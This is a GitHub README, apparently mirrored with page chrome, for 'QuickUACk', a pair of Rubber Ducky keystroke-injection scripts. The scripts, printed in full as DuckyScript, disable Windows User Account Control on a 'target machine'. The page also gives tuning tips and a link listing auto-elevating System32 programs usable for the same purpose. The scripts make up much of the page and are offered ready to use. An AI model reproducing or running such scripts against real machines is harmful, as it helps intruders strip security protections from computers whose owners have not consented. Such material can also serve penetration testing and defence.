JonnyBanana / QuickUACk

:baby_chick: Some of my antiUAC Scripts for Rubbber Ducky :baby_chick:

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

QuickUACk!

Some of my antiUAC Scripts for Rubbber Ducky.


alt text


A pair of fast solutions to disable UAC (User Account Control)
it works on all windows version 32 and 64 bits with uac (Vista or Earlier)
and are valid for all languages (Latin, of course).

The scripts were created with the Italian keyboard,
so I do not exclude that in some cases they require minor adjustments.
if the target machine is old, I recommend extending the delay time.


Ver 1.0 uses a .exe application from the C: \ Windows \ System32 (system protected) folder,
to start the uac on-screen control and switch to the uac panel.
the C: \ Windows \ SysWOW64 folder for the purpose or other protected system folders that contain exe are also fine.
Several applications contained in System32 are good, but be careful because there are some exceptions.
You can consult this list to see the applications that are whitelisted by default on W7
and therefore do not require uac checking to be performed:

https://books.google.it/books?id=1EXt2U84WZ0C&pg=PA278&lpg=PA278&dq=AdapterTroubleshooter.exe&source=bl&ots=sWxJuFdZdU&sig=OhOUJ9gzJxfLb4jlJPiuZyP2F-U&hl=it&sa=X&ved=0ahUKEwi37qe0_fvaAhWMyqYKHWz8CWQQ6AEIcDAN#v=onepage&q=AdapterTroubleshooter.exe&f=false


alt text


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

QuickUACk Ver. 1.0

DELAY 2000
CTRL ESC
DELAY 200
REM C:\Windows\System32\AdapterTroubleshooter.exe"
REM work on windows version 32 and 64 bit (Vista or Earlier)
REM no reboot is required for disabling
STRING AdapterTroubleshooter
DELAY 200
ENTER
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER

-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

QuickUACk Ver. 2.0

DELAY 2000
CTRL ESC
DELAY 200
REM opens directly the User Account Control Panel
REM work on all windows version 32 and 64 bit with uac (Vista or Earlier)
REM no reboot is required for disabling
STRING UAC
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER
DELAY 200
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DELAY 200
TAB
DELAY 200
ENTER
DELAY 200
LEFTARROW
DELAY 200
ENTER


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Best VPN

About

:baby_chick: Some of my antiUAC Scripts for Rubbber Ducky :baby_chick: